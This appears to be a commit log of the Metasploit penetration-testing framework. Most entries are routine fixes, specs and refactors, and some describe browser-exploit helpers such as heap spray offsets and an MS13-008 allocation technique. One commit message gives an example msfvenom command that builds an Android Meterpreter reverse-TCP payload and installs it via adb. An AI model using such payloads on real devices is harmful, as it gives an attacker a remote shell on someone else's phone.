Commit Graph

2917 Commits (785639148c97e59593521ee05d88c3d3ceb756c0)

Author SHA1 Message Date
James Lee 9ab68ac935 Fix unintelligible error when importing empty file
IO#read returns nil for an empty file if given a length argument, which
caused a stack trace when attempting to import a file instead of a
useful error message.
2013-05-07 18:05:45 -05:00
James Lee 9e7885857c Land #1776, assembly payload blob cache fix 2013-05-02 16:58:14 -05:00
James Lee 0d9b120bac Get rid of the suffix
This makes blob cache a little cleaner

[FixRM #7898]
2013-05-02 16:55:14 -05:00
jvazquez-r7 5cfc306466 Land @1785, @wchen-r7's API addition for the mstime ie8 technique 2013-05-02 00:00:49 -05:00
sinn3r 69f8103ffe Make animatecolor element optional by using innerHTML 2013-05-01 14:21:52 -05:00
sinn3r 3d2cb9ec3f Uses rand_text_hex for RGB values, and correcting exception handling 2013-05-01 13:41:36 -05:00
sinn3r 71afd762a9 According to MSFG, I can use RGB, so here goes 2013-04-30 18:48:21 -05:00
sinn3r ae94fbdf6c Updates documentation 2013-04-30 17:11:19 -05:00
sinn3r 9cc624456a Adds function js_mstime_malloc
This function takes advantage of MSTIME's CTIMEAnimationBase::put_values
function that's suitable for a no-spray technique (based on wtfuzz's
PoC for MS13-008)
2013-04-30 16:40:10 -05:00
kernelsmith cf7702f7e9 "acitve" should be "aggressive"
fixes http://dev.metasploit.com/redmine/issues/7926 which prevented a
proper search using:
msf> search exploit:type app:server
2013-04-30 13:04:19 -05:00
James Lee 906863676e Fix a logic error in HttpServer
When a module is configured to listen on the INADDR_ANY interface, with
a payload that does not have an LHOST option, it attempts to determine
the srvhost from a client socket which would only be available when the
module has included the TcpClient mixin (i.e., it is both passive and
aggressive stance), causing a NameError for the undefined +sock+.

This commit fixes the problem in two ways:

1. It changes the default cli in get_uri to be the module's self.cli,
   which should always be set when passive modules would need it (e.g., in
   the on_request_uri method).

2. It adds a check to make sure that the calling module has a sock
   before trying to get its peerhost. This was @marthieubean's suggested
   solution in #1775.

[Closes #1775]
2013-04-29 13:44:58 -05:00
Raphael Mudge 21f8e19d55 Single Payloads Cache Assembled Payload Improperly
An earlier change to the framework (prepend_migrate) forced single
payloads to use the internal_generate method of payload.rb.

internal_generate calls build which has a cache to track assembled
payloads. This method assumes that a payload only needs to be
assembled once, with optional values patched in later.

Single payloads do not work this way. Each time they are generated
new assembly source is created with the options hardcoded in.

This fix updates build to use the hashcode of the assembly code as
part of the cache key.

This fixes #7898 -- a bug that prevents a user from generating
multiple variations of a single payload without a restart.
2013-04-29 11:54:53 -04:00
Luke Imhoff 249a09cd52 Update to metasploit_data_models 0.7.1
[#47979793]
2013-04-26 13:14:38 -05:00
sinn3r b1e49e7116 Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master 2013-04-25 20:54:28 -05:00
sinn3r 5b0ae1476b Let's word this a little differently 2013-04-25 20:52:51 -05:00
Meatballs b58a775af5 Added opt delay to file_dropper 2013-04-25 20:52:51 -05:00
sinn3r 008266a581 Corrects documentation. Thanks Meatballs1 2013-04-25 19:13:16 -05:00
sinn3r ff87e3622b Changes made according to feedback from Juan and James 2013-04-25 15:19:44 -05:00
James Lee 6767eee08a Add in-line signing
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.

Example usage:
  ./msfvenom -p android/meterpreter/reverse_tcp \
    LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
  adb install ./meterp.apk
2013-04-25 13:57:54 -05:00
Luke Imhoff 24b97137ea Msf::DBManager Mdm::Module* specs
[#47979793]
2013-04-25 09:46:53 -05:00
sinn3r 6642545551 Adds new JavaScript function "js_download"
"js_download" is a JavaScript function used to download data (text
or binary) from the web server.
2013-04-24 17:36:45 -05:00
Luke Imhoff 492b081280 Msf::DBManager::Export#extract_module_detail_info spec
[#47979793]
2013-04-20 16:44:42 -05:00
Luke Imhoff e5befb7094 Msf::DBManager#report_session specs
[#47979793]
2013-04-19 10:11:33 -05:00
Tod Beardsley 25fcbd4e70 Landing #1733, setting a sensible heapsray offset
@wchen-r7 says that nobody's using it today, much less relying on the
default, so this should make no functional difference to any browser
exploits.
2013-04-15 16:32:48 -05:00
Tod Beardsley 7f8040c4e4 Lands #1722, Rex::Socket comment docs 2013-04-15 13:44:00 -05:00
Luke Imhoff 2c681005c0 Msf::ModuleManager::Cache spec coverage
[#47979793]
2013-04-15 13:08:12 -05:00
timwr df9c5f4a80 remove unused resources and fix whitespace 2013-04-13 16:22:52 +01:00
scriptjunkie 2c41ca6598 Merge branch 'encoding_fix' of git://github.com/rsmudge/metasploit-framework 2013-04-12 21:10:44 -05:00
sinn3r d28db8a2a3 Forgot the comment 2013-04-12 20:21:10 -05:00
sinn3r f2cbbf43e8 Changes default offset
Points to the beginning of the block
2013-04-12 20:19:47 -05:00
timwr 32bd812bdb android meterpreter 2013-04-12 18:57:04 +01:00
James Lee 6a0b240d10 Add some better docs for Rex::Socket 2013-04-10 12:41:41 -05:00
Rob Fuller 2949c4a339 enable stage encoding for reverse_http(s) 2013-04-10 12:10:17 -03:00
Tod Beardsley 6a5d318749 Bumping version. 2013-04-10 08:59:56 -05:00
James Lee cd86a69090 Have Post::File use shiny new session.fs.file.mv
Also adds a quick and dirty test. Verified working on Linux shell, Linux
meterpreter, and Windows x86 and x64 meterpreter.
2013-04-05 01:24:24 -05:00
Luke Imhoff 809969b49f Merge branch 'master' into feature/patchable-web-vuln-import 2013-04-02 22:38:54 -05:00
Luke Imhoff 0bb79ba890 Msf::DBManager#import_msf_xml refactor
[#46491831]

Move Msf::DBManager#import_msf_xml into
Msf::DBManager::ImportMsfXml#import_msf_xml and include
Msf::DBManager::ImportMsfXml to cut down size of the infamous db.rb.
Break up #import_msf_xml to have separate methods for parsing web_forms,
web_pages, and web_vulns.  The method for
web_vulns, #import_msf_web_vuln_element is needed so that it can be overridden in
Pro to handle the Pro-only changes to Mdm::WebVuln.
2013-04-01 16:06:40 -05:00
Luke Imhoff 2317e9cced Fix yard tag warnings
[#46491831]
2013-03-30 17:13:12 -05:00
Luke Imhoff 7ed2812ec3 Fix Cannot resolve link YARD warnings
[#46491831]
2013-03-30 16:58:49 -05:00
Luke Imhoff c210260845 Fix Undocumentable method, missing name YARD warning
[#46491831]

Comments at the start of the file with ## caused YARD to think the
comment was documenting the require call.  By removing the ##, the
warning disappeared.  I did not determine what is special about ## in
file comments.
2013-03-30 15:32:38 -05:00
sinn3r 463725efec Merge branch 'bug/winrm_poke' of github.com:dmaloney-r7/metasploit-framework into dmaloney-r7-bug/winrm_poke 2013-03-29 09:30:21 -05:00
Tasos Laskos 380f5f56ae Auxiliary::Web::HTTP#_request: print_error => elog
[SEERM #7839]

Reverted earlier commit.
2013-03-27 16:36:50 +02:00
David Maloney a87e414274 fix winrm poke method 2013-03-26 13:05:33 -05:00
David Maloney 509ae76dc9 make sure we grab the workspace for store_local
store_local calls report note from db.rb directly instead of going
through the report method. this means we might miss the workspace
causing a stack trace
2013-03-22 16:52:38 -05:00
sinn3r 0634cb9892 Need to avoid badchar 0x00
0x00 becomes double null, which functions like a terminator
2013-03-22 13:18:32 -05:00
sinn3r 566806487c Randomize the "div_container" var because it's global
It's best to randomize this variable name because it's global.
2013-03-22 13:16:14 -05:00
sinn3r 1ac31a3e12 Merge branch 'bug/web-path-api-update' of github.com:tasos-r7/metasploit-framework into tasos-r7-bug/web-path-api-update 2013-03-22 12:54:23 -05:00
sinn3r cce74246d8 Merge branch 'master' of github.com:rapid7/metasploit-framework 2013-03-19 15:03:24 -05:00
Tasos Laskos 11c38d925b Auxiliary::Web::Path: Fuzzable API update
[FIXRM #7817]

Path object was using an outdated fuzzable API which was causing
scan errors.
2013-03-19 18:41:52 +02:00
Tasos Laskos ad39a5cdc3 Auxiliary::Web::HTTP#_request: elog => print_error
[SEERM #7815]

Switched form elog to print_error to make reporting bugs easier on users.
2013-03-19 17:18:44 +02:00
Tod Beardsley afcbaffa2b Revert "add -R capability like hosts -R"
Pulling out the set_rhosts_from_addrs -- that's not required for
grep-like functionality, and adding this method to the global namespace
is undesirable.

This reverts commit 52596ae3b4.
2013-03-18 15:28:19 -05:00
Tod Beardsley 91e3f4cca6 Merge 'kernelsmith/msfconsole-grep'
Resolved a conflict between grep and go_pro (go_pro was added after
grep). Adds @kernelsmith's grep command. Josh is determined to have
msfconsole be his default shell, it seems.

[Closes #1320]

Conflicts:
	lib/msf/ui/console/command_dispatcher/core.rb
2013-03-18 14:39:45 -05:00
Luke Imhoff 2075a7b46c Remove active_record patch
[#46141013]

Version 3.2.12 of activerecord contains the changes that the original
patch made so the patch is no longer needed.
2013-03-18 11:32:21 -05:00
Tasos Laskos 5967991f6f Auxiliary::Web#log_*: details[:category] => #name
Recent category updates to modules caused variations of vulns of the
same type to be ignored leading to a smaller exploitation surface.
Thus, use the #name of the module as the key instead of the category name.
2013-03-12 19:43:47 +02:00
Tasos Laskos c641ca96c1 Auxiliary::Web::Path.from_model: inputs => form.inputs
Fixed uninitialized variable error.
2013-03-11 23:08:41 +02:00
Raphael Mudge d764740779 Convert user/pass tokens to ASCII in db.rb
This commit fixes an Encoding::CompatibilityError incompatible
encoding regexp match (ASCII-8BIT regexp with UTF-8 string) when
sanitizing non-printable tokens from a user/pass string.

The UTF-8 strings are derived from strings passed through the
module.execute RPC call.
2013-03-11 15:02:28 -04:00
Tasos Laskos 7e15788bb5 Auxiliary::Web: updated form of vuln storage in parent
#log_fingerprint and #log_resource now create a key in the
parent's #vulns attribute with the name of the vuln type and
store the details of each such vuln under it.
2013-03-08 22:38:23 +02:00
Spencer McIntyre 8b5a83c7f5 Remove the DECODER option 2013-03-08 15:25:16 -05:00
Tasos Laskos ac6065d8f9 Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging 2013-03-08 21:50:49 +02:00
Tasos Laskos 3422a7c098 Auxiliary::Web: force vuln proof to_s 2013-03-08 21:50:01 +02:00
Spencer McIntyre aceba9fc8a Revert "escape ticks and spaces in paths"
This reverts commit 4c87b1ba36.
2013-03-08 14:37:28 -05:00
James Lee db676f1a88 Whitespace at EOL 2013-03-07 18:20:08 -06:00
Tasos Laskos cf3df4b179 Auxiliary::Web::HTTP: added error output
Instead of using elog when an HTTP request callback throws an
exception, use the HTTP class' parent #print_error.
2013-03-07 20:14:38 +02:00
Tasos Laskos d9a6f5f0ca Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging 2013-03-06 18:26:18 +02:00
Tasos Laskos c497d5ffef Auxiliary::Web: log methods pass vuln info to parent 2013-03-06 18:25:25 +02:00
Samuel Huckins 09fc52f3d9 Merge pull request #1536 from rapid7/feature/active-record-migrator-migrations-paths
Use ActiveRecord::Migrator  multiple migrations paths support
2013-03-06 08:20:36 -08:00
James Lee 24c0da0adb Merge branch 'rapid7' into doc/cleanup-peparsey 2013-03-05 21:00:26 -06:00
James Lee 27727df415 Merge branch 'R3dy-psexec-mixin2' into rapid7 2013-03-05 14:36:55 -06:00
James Lee a928e5f963 Whitespace 2013-03-05 14:34:56 -06:00
David Maloney f5c23e4b02 fix typo snaffu 2013-03-05 12:35:21 -06:00
David Maloney 1407886e83 Revert "fix a major typo snaffu"
This reverts commit c639de7ccc.
2013-03-05 12:34:51 -06:00
David Maloney c639de7ccc fix a major typo snaffu 2013-03-05 12:33:37 -06:00
James Lee ac63965e4d Merge remote-tracking branch 'gerry/nbe_importing_fix' into rapid7 2013-03-04 20:00:50 -06:00
James Lee c0689a7d43 Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7 2013-03-04 12:14:33 -06:00
David Maloney 6dcca7df78 Remove duplicated header issues
Headers were getting duped back into client config, causing invalid
requests to be sent out
2013-03-04 11:24:26 -06:00
Luke Imhoff 0ddc6b3afa Document Msf::DBManager#initialize_metasploit_data_models 2013-03-02 21:16:02 -06:00
Luke Imhoff c9a162ac33 Correct return type of Msf::DBManager#migrate. 2013-03-02 21:09:45 -06:00
Luke Imhoff af4b3fa287 Use ActiveRecord::Migrator multiple migrations paths support
[#44034071]

ActiveRecord::Migrator has a class attribute, migrations_paths,
specificially for storing a list of different directories that have
migrations in them.  ActiveRecord::Migrator.migrations_paths is used in
rake db:load_config, which is a dependency of db:migrate, etc. that is
passed to ActiveRecord::Migrator.migrate.  Since migrate supports an
array of directories, and not just a single directory, there is no need
to merge all the migrations paths into one temporary directory as was
previously done.
2013-03-02 20:33:48 -06:00
Samuel Huckins 2e4760c486 Merge pull request #1533 from rapid7/feature/migrations-in-metasploit_data_models
All steps passing as described.
2013-03-01 12:54:41 -08:00
Tasos Laskos 99a8ec593b Fixing merge conflicts 2013-03-01 20:21:02 +02:00
David Maloney 4212c36566 Fix up basic auth madness 2013-03-01 11:59:02 -06:00
Samuel Huckins 7b8654a71d Revert "Merge pull request #1534 from tasos-r7/bugfix/web-vuln-confidence"
This reverts commit 3840ddccbc, reversing
changes made to e1891f0836.
2013-03-01 11:41:06 -06:00
Samuel Huckins 3840ddccbc Merge pull request #1534 from tasos-r7/bugfix/web-vuln-confidence
Auxiliary::Web: fixed confidence calculation in log methods
2013-03-01 09:25:07 -08:00
Tasos Laskos 862b813786 Auxiliary::Web: fixed confidence calc in log methods 2013-03-01 18:33:16 +02:00
Luke Imhoff 239e1934b8 Use migrations from metasploit_data_models
[#44034071]

metasploit_data_models version 0.5.0 copied the migrations from
metasploit-framework/data/sql/migrate to
metasploit_data_models/db/migrate so that specs could be written the Mdm
models in metasploit_data_models.  As part of the specs, :null => false
columns that should be :null => true were discovered, so a new migration
was added, but to metasploit_data_models/db/migrate, so it could be
tested.  Instead of replicating migrations back and forth, I'm removing
the migrations completely from metasploit-framework and changing the
default migration path in Msf::DbManager#migration_paths to
MetasploitDataModels.root.join('db', 'migrate').
2013-03-01 09:03:45 -06:00
David Maloney c290bc565e Merge branch 'master' into feature/http/authv2 2013-02-28 14:33:44 -06:00
sinn3r 18c0bb0ac8 Updates description again 2013-02-28 11:34:48 -06:00
sinn3r 8cb5da0794 One size rules them all. 2013-02-28 11:21:23 -06:00
sinn3r 722e077029 Update generic target 2013-02-28 11:09:52 -06:00
sinn3r 2c013cada8 Update documentation for default values 2013-02-28 11:05:18 -06:00
sinn3r 86d78939ad Make objId optional 2013-02-28 11:01:15 -06:00
sinn3r 9f35452d73 Beef up the default values for precise alloc size and consistency 2013-02-28 10:35:40 -06:00
sinn3r bb02dc43b3 Documentation 2013-02-27 15:34:21 -06:00
sinn3r 312638d6a5 Correct allocation size for IE10 2013-02-27 14:32:39 -06:00
sinn3r e3f0757304 Improved version thanks to corelanc0d3r 2013-02-27 14:08:57 -06:00
sinn3r 2a7b4ee3d8 Merge branch 'master' into setstringproperty_spray 2013-02-27 11:15:52 -06:00
Gerry Eisenhaur 724b32af17 Fixed the importing of NBE files 2013-02-26 16:55:26 -08:00
sinn3r 38af8ba866 Merge branch 'feature/sqli-exploitation-mssql' of github.com:tasos-r7/metasploit-framework into tasos-r7-feature/sqli-exploitation-mssql 2013-02-26 13:41:32 -06:00
Tasos Laskos 0421cff913 Exploit::Remote::Web#perform_request: timeout set to 10 2013-02-25 19:49:39 +02:00
HD Moore 9d9d83cf8b Implement per-target arch/platform searches SeeRM #7754 2013-02-24 11:06:29 -06:00